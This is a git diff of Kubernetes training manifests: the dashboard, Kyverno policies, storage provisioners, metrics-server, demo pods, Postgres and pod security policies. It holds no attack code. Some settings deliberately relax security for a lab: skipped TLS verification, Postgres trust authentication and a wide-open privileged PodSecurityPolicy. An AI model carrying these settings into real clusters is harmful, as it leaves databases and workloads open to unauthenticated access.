namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Deployment ------------------- #
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1beta2
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service ------------------- #
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
63
k8s/kyverno-namespace-setup.yaml
Normal file
63
k8s/kyverno-namespace-setup.yaml
Normal file
@@ -0,0 +1,63 @@
|
||||
apiVersion: kyverno.io/v1
|
||||
kind: ClusterPolicy
|
||||
metadata:
|
||||
name: setup-namespace
|
||||
spec:
|
||||
rules:
|
||||
- name: setup-limitrange
|
||||
match:
|
||||
resources:
|
||||
kinds:
|
||||
- Namespace
|
||||
generate:
|
||||
kind: LimitRange
|
||||
name: default-limitrange
|
||||
namespace: "{{request.object.metadata.name}}"
|
||||
data:
|
||||
spec:
|
||||
limits:
|
||||
- type: Container
|
||||
min:
|
||||
cpu: 0.1
|
||||
memory: 0.1
|
||||
max:
|
||||
cpu: 2
|
||||
memory: 2Gi
|
||||
default:
|
||||
cpu: 0.25
|
||||
memory: 500Mi
|
||||
defaultRequest:
|
||||
cpu: 0.25
|
||||
memory: 250Mi
|
||||
- name: setup-resourcequota
|
||||
match:
|
||||
resources:
|
||||
kinds:
|
||||
- Namespace
|
||||
generate:
|
||||
kind: ResourceQuota
|
||||
name: default-resourcequota
|
||||
namespace: "{{request.object.metadata.name}}"
|
||||
data:
|
||||
spec:
|
||||
hard:
|
||||
requests.cpu: "10"
|
||||
requests.memory: 10Gi
|
||||
limits.cpu: "20"
|
||||
limits.memory: 20Gi
|
||||
- name: setup-networkpolicy
|
||||
match:
|
||||
resources:
|
||||
kinds:
|
||||
- Namespace
|
||||
generate:
|
||||
kind: NetworkPolicy
|
||||
name: default-networkpolicy
|
||||
namespace: "{{request.object.metadata.name}}"
|
||||
data:
|
||||
spec:
|
||||
podSelector: {}
|
||||
ingress:
|
||||
- from:
|
||||
- podSelector: {}
|
||||
|
||||
22
k8s/kyverno-pod-color-1.yaml
Normal file
22
k8s/kyverno-pod-color-1.yaml
Normal file
@@ -0,0 +1,22 @@
|
||||
apiVersion: kyverno.io/v1
|
||||
kind: ClusterPolicy
|
||||
metadata:
|
||||
name: pod-color-policy-1
|
||||
spec:
|
||||
validationFailureAction: enforce
|
||||
rules:
|
||||
- name: ensure-pod-color-is-valid
|
||||
match:
|
||||
resources:
|
||||
kinds:
|
||||
- Pod
|
||||
selector:
|
||||
matchExpressions:
|
||||
- key: color
|
||||
operator: Exists
|
||||
- key: color
|
||||
operator: NotIn
|
||||
values: [ red, green, blue ]
|
||||
validate:
|
||||
message: "If it exists, the label color must be red, green, or blue."
|
||||
deny: {}
|
||||
21
k8s/kyverno-pod-color-2.yaml
Normal file
21
k8s/kyverno-pod-color-2.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: kyverno.io/v1
|
||||
kind: ClusterPolicy
|
||||
metadata:
|
||||
name: pod-color-policy-2
|
||||
spec:
|
||||
validationFailureAction: enforce
|
||||
background: false
|
||||
rules:
|
||||
- name: prevent-color-change
|
||||
match:
|
||||
resources:
|
||||
kinds:
|
||||
- Pod
|
||||
validate:
|
||||
message: "Once label color has been added, it cannot be changed."
|
||||
deny:
|
||||
conditions:
|
||||
- key: "{{ request.oldObject.metadata.labels.color }}"
|
||||
operator: NotEqual
|
||||
value: "{{ request.object.metadata.labels.color }}"
|
||||
|
||||
25
k8s/kyverno-pod-color-3.yaml
Normal file
25
k8s/kyverno-pod-color-3.yaml
Normal file
@@ -0,0 +1,25 @@
|
||||
apiVersion: kyverno.io/v1
|
||||
kind: ClusterPolicy
|
||||
metadata:
|
||||
name: pod-color-policy-3
|
||||
spec:
|
||||
validationFailureAction: enforce
|
||||
background: false
|
||||
rules:
|
||||
- name: prevent-color-removal
|
||||
match:
|
||||
resources:
|
||||
kinds:
|
||||
- Pod
|
||||
selector:
|
||||
matchExpressions:
|
||||
- key: color
|
||||
operator: DoesNotExist
|
||||
validate:
|
||||
message: "Once label color has been added, it cannot be removed."
|
||||
deny:
|
||||
conditions:
|
||||
- key: "{{ request.oldObject.metadata.labels.color }}"
|
||||
operator: NotIn
|
||||
value: []
|
||||
|
||||
160
k8s/local-path-storage.yaml
Normal file
160
k8s/local-path-storage.yaml
Normal file
@@ -0,0 +1,160 @@
|
||||
# This is a local copy of:
|
||||
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: local-path-storage
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: local-path-provisioner-role
|
||||
rules:
|
||||
- apiGroups: [ "" ]
|
||||
resources: [ "nodes", "persistentvolumeclaims", "configmaps" ]
|
||||
verbs: [ "get", "list", "watch" ]
|
||||
- apiGroups: [ "" ]
|
||||
resources: [ "endpoints", "persistentvolumes", "pods" ]
|
||||
verbs: [ "*" ]
|
||||
- apiGroups: [ "" ]
|
||||
resources: [ "events" ]
|
||||
verbs: [ "create", "patch" ]
|
||||
- apiGroups: [ "storage.k8s.io" ]
|
||||
resources: [ "storageclasses" ]
|
||||
verbs: [ "get", "list", "watch" ]
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: local-path-provisioner-bind
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: local-path-provisioner-role
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: local-path-provisioner
|
||||
namespace: local-path-storage
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: local-path-provisioner
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: local-path-provisioner
|
||||
spec:
|
||||
serviceAccountName: local-path-provisioner-service-account
|
||||
containers:
|
||||
- name: local-path-provisioner
|
||||
image: rancher/local-path-provisioner:v0.0.19
|
||||
imagePullPolicy: IfNotPresent
|
||||
command:
|
||||
- local-path-provisioner
|
||||
- --debug
|
||||
- start
|
||||
- --config
|
||||
- /etc/config/config.json
|
||||
volumeMounts:
|
||||
- name: config-volume
|
||||
mountPath: /etc/config/
|
||||
env:
|
||||
- name: POD_NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
volumes:
|
||||
- name: config-volume
|
||||
configMap:
|
||||
name: local-path-config
|
||||
|
||||
---
|
||||
apiVersion: storage.k8s.io/v1
|
||||
kind: StorageClass
|
||||
metadata:
|
||||
name: local-path
|
||||
provisioner: rancher.io/local-path
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
reclaimPolicy: Delete
|
||||
|
||||
---
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: local-path-config
|
||||
namespace: local-path-storage
|
||||
data:
|
||||
config.json: |-
|
||||
{
|
||||
"nodePathMap":[
|
||||
{
|
||||
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
|
||||
"paths":["/opt/local-path-provisioner"]
|
||||
}
|
||||
]
|
||||
}
|
||||
setup: |-
|
||||
#!/bin/sh
|
||||
while getopts "m:s:p:" opt
|
||||
do
|
||||
case $opt in
|
||||
p)
|
||||
absolutePath=$OPTARG
|
||||
;;
|
||||
s)
|
||||
sizeInBytes=$OPTARG
|
||||
;;
|
||||
m)
|
||||
volMode=$OPTARG
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
mkdir -m 0777 -p ${absolutePath}
|
||||
teardown: |-
|
||||
#!/bin/sh
|
||||
while getopts "m:s:p:" opt
|
||||
do
|
||||
case $opt in
|
||||
p)
|
||||
absolutePath=$OPTARG
|
||||
;;
|
||||
s)
|
||||
sizeInBytes=$OPTARG
|
||||
;;
|
||||
m)
|
||||
volMode=$OPTARG
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
rm -rf ${absolutePath}
|
||||
helperPod.yaml: |-
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: helper-pod
|
||||
spec:
|
||||
containers:
|
||||
- name: helper-pod
|
||||
image: busybox
|
||||
|
||||
|
||||
|
||||
@@ -1,32 +1,61 @@
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
# This file is https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml
|
||||
# But with the following arguments added to metrics-server:
|
||||
# args:
|
||||
# - --kubelet-insecure-tls
|
||||
# - --metric-resolution=5s
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: system:aggregated-metrics-reader
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rules:
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: metrics-server:system:auth-delegator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:auth-delegator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
k8s-app: metrics-server
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
name: system:aggregated-metrics-reader
|
||||
rules:
|
||||
- apiGroups:
|
||||
- metrics.k8s.io
|
||||
resources:
|
||||
- pods
|
||||
- nodes
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
name: system:metrics-server
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- nodes
|
||||
- nodes/stats
|
||||
- namespaces
|
||||
- configmaps
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
name: metrics-server-auth-reader
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
@@ -38,95 +67,26 @@ subjects:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: apiregistration.k8s.io/v1beta1
|
||||
kind: APIService
|
||||
metadata:
|
||||
name: v1beta1.metrics.k8s.io
|
||||
spec:
|
||||
service:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
group: metrics.k8s.io
|
||||
version: v1beta1
|
||||
insecureSkipTLSVerify: true
|
||||
groupPriorityMinimum: 100
|
||||
versionPriority: 100
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: metrics-server
|
||||
template:
|
||||
metadata:
|
||||
name: metrics-server
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
serviceAccountName: metrics-server
|
||||
volumes:
|
||||
# mount in tmp so we can safely use from-scratch images and/or read-only containers
|
||||
- name: tmp-dir
|
||||
emptyDir: {}
|
||||
containers:
|
||||
- name: metrics-server
|
||||
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
|
||||
imagePullPolicy: Always
|
||||
volumeMounts:
|
||||
- name: tmp-dir
|
||||
mountPath: /tmp
|
||||
args:
|
||||
- --kubelet-preferred-address-types=InternalIP
|
||||
- --kubelet-insecure-tls
|
||||
- --metric-resolution=5s
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
kubernetes.io/name: "Metrics-server"
|
||||
spec:
|
||||
selector:
|
||||
k8s-app: metrics-server
|
||||
ports:
|
||||
- port: 443
|
||||
protocol: TCP
|
||||
targetPort: 443
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- nodes
|
||||
- nodes/stats
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
name: metrics-server:system:auth-delegator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:auth-delegator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
name: system:metrics-server
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
@@ -136,3 +96,98 @@ subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
spec:
|
||||
ports:
|
||||
- name: https
|
||||
port: 443
|
||||
protocol: TCP
|
||||
targetPort: https
|
||||
selector:
|
||||
k8s-app: metrics-server
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: metrics-server
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxUnavailable: 0
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- --cert-dir=/tmp
|
||||
- --secure-port=4443
|
||||
- --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
|
||||
- --kubelet-use-node-status-port
|
||||
- --kubelet-insecure-tls
|
||||
- --metric-resolution=5s
|
||||
image: k8s.gcr.io/metrics-server/metrics-server:v0.4.3
|
||||
imagePullPolicy: IfNotPresent
|
||||
livenessProbe:
|
||||
failureThreshold: 3
|
||||
httpGet:
|
||||
path: /livez
|
||||
port: https
|
||||
scheme: HTTPS
|
||||
periodSeconds: 10
|
||||
name: metrics-server
|
||||
ports:
|
||||
- containerPort: 4443
|
||||
name: https
|
||||
protocol: TCP
|
||||
readinessProbe:
|
||||
failureThreshold: 3
|
||||
httpGet:
|
||||
path: /readyz
|
||||
port: https
|
||||
scheme: HTTPS
|
||||
periodSeconds: 10
|
||||
securityContext:
|
||||
readOnlyRootFilesystem: true
|
||||
runAsNonRoot: true
|
||||
runAsUser: 1000
|
||||
volumeMounts:
|
||||
- mountPath: /tmp
|
||||
name: tmp-dir
|
||||
nodeSelector:
|
||||
kubernetes.io/os: linux
|
||||
priorityClassName: system-cluster-critical
|
||||
serviceAccountName: metrics-server
|
||||
volumes:
|
||||
- emptyDir: {}
|
||||
name: tmp-dir
|
||||
---
|
||||
apiVersion: apiregistration.k8s.io/v1
|
||||
kind: APIService
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
name: v1beta1.metrics.k8s.io
|
||||
spec:
|
||||
group: metrics.k8s.io
|
||||
groupPriorityMinimum: 100
|
||||
insecureSkipTLSVerify: true
|
||||
service:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
version: v1beta1
|
||||
versionPriority: 100
|
||||
|
||||
8
k8s/nginx-1-without-volume.yaml
Normal file
8
k8s/nginx-1-without-volume.yaml
Normal file
@@ -0,0 +1,8 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-without-volume
|
||||
spec:
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
13
k8s/nginx-2-with-volume.yaml
Normal file
13
k8s/nginx-2-with-volume.yaml
Normal file
@@ -0,0 +1,13 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-volume
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
21
k8s/nginx-3-with-git.yaml
Normal file
21
k8s/nginx-3-with-git.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-git
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
- name: git
|
||||
image: alpine
|
||||
command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /www/
|
||||
restartPolicy: OnFailure
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-volume
|
||||
name: nginx-with-init
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
@@ -11,11 +11,10 @@ spec:
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
initContainers:
|
||||
- name: git
|
||||
image: alpine
|
||||
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
|
||||
command: [ "sh", "-c", "apk add git && sleep 5 && git clone https://github.com/octocat/Spoon-Knife /www" ]
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /www/
|
||||
restartPolicy: OnFailure
|
||||
|
||||
24
k8s/openebs-pod.yaml
Normal file
24
k8s/openebs-pod.yaml
Normal file
@@ -0,0 +1,24 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: openebs-local-hostpath-pod
|
||||
spec:
|
||||
volumes:
|
||||
- name: storage
|
||||
persistentVolumeClaim:
|
||||
claimName: local-hostpath-pvc
|
||||
containers:
|
||||
- name: better
|
||||
image: alpine
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- |
|
||||
while true; do
|
||||
echo "$(date) [$(hostname)] Kubernetes is better with PVs." >> /mnt/storage/greet.txt
|
||||
sleep $(($RANDOM % 5 + 20))
|
||||
done
|
||||
volumeMounts:
|
||||
- mountPath: /mnt/storage
|
||||
name: storage
|
||||
|
||||
98
k8s/persistent-consul.yaml
Normal file
98
k8s/persistent-consul.yaml
Normal file
@@ -0,0 +1,98 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: persistentconsul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: persistentconsul
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: persistentconsul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
spec:
|
||||
serviceName: persistentconsul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: persistentconsul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: persistentconsul
|
||||
spec:
|
||||
serviceAccountName: persistentconsul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- persistentconsul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.6"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
1894
k8s/portworx.yaml
1894
k8s/portworx.yaml
File diff suppressed because it is too large
Load Diff
@@ -12,10 +12,20 @@ spec:
|
||||
labels:
|
||||
app: postgres
|
||||
spec:
|
||||
schedulerName: stork
|
||||
#schedulerName: stork
|
||||
initContainers:
|
||||
- name: rmdir
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- mountPath: /vol
|
||||
name: postgres
|
||||
command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
|
||||
containers:
|
||||
- name: postgres
|
||||
image: postgres:10.5
|
||||
image: postgres:12
|
||||
env:
|
||||
- name: POSTGRES_HOST_AUTH_METHOD
|
||||
value: trust
|
||||
volumeMounts:
|
||||
- mountPath: /var/lib/postgresql/data
|
||||
name: postgres
|
||||
|
||||
39
k8s/psp-privileged.yaml
Normal file
39
k8s/psp-privileged.yaml
Normal file
@@ -0,0 +1,39 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
name: privileged
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
|
||||
spec:
|
||||
privileged: true
|
||||
allowPrivilegeEscalation: true
|
||||
allowedCapabilities:
|
||||
- '*'
|
||||
volumes:
|
||||
- '*'
|
||||
hostNetwork: true
|
||||
hostPorts:
|
||||
- min: 0
|
||||
max: 65535
|
||||
hostIPC: true
|
||||
hostPID: true
|
||||
runAsUser:
|
||||
rule: 'RunAsAny'
|
||||
seLinux:
|
||||
rule: 'RunAsAny'
|
||||
supplementalGroups:
|
||||
rule: 'RunAsAny'
|
||||
fsGroup:
|
||||
rule: 'RunAsAny'
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:privileged
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['privileged']
|
||||
|
||||
38
k8s/psp-restricted.yaml
Normal file
38
k8s/psp-restricted.yaml
Normal file
@@ -0,0 +1,38 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
annotations:
|
||||
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
|
||||
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: runtime/default
|
||||
seccomp.security.alpha.kubernetes.io/defaultProfileName: runtime/default
|
||||
name: restricted
|
||||
spec:
|
||||
allowPrivilegeEscalation: false
|
||||
fsGroup:
|
||||
rule: RunAsAny
|
||||
runAsUser:
|
||||
rule: RunAsAny
|
||||
seLinux:
|
||||
rule: RunAsAny
|
||||
supplementalGroups:
|
||||
rule: RunAsAny
|
||||
volumes:
|
||||
- configMap
|
||||
- emptyDir
|
||||
- projected
|
||||
- secret
|
||||
- downwardAPI
|
||||
- persistentVolumeClaim
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:restricted
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['restricted']
|
||||
|
||||
@@ -1,28 +1,17 @@
|
||||
apiVersion: extensions/v1beta1
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
annotations:
|
||||
deployment.kubernetes.io/revision: "2"
|
||||
creationTimestamp: null
|
||||
generation: 1
|
||||
labels:
|
||||
app: socat
|
||||
name: socat
|
||||
namespace: kube-system
|
||||
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: socat
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
template:
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
app: socat
|
||||
spec:
|
||||
@@ -34,34 +23,19 @@ spec:
|
||||
image: alpine
|
||||
imagePullPolicy: Always
|
||||
name: socat
|
||||
resources: {}
|
||||
terminationMessagePath: /dev/termination-log
|
||||
terminationMessagePolicy: File
|
||||
dnsPolicy: ClusterFirst
|
||||
restartPolicy: Always
|
||||
schedulerName: default-scheduler
|
||||
securityContext: {}
|
||||
terminationGracePeriodSeconds: 30
|
||||
status: {}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
app: socat
|
||||
name: socat
|
||||
namespace: kube-system
|
||||
selfLink: /api/v1/namespaces/kube-system/services/socat
|
||||
spec:
|
||||
externalTrafficPolicy: Cluster
|
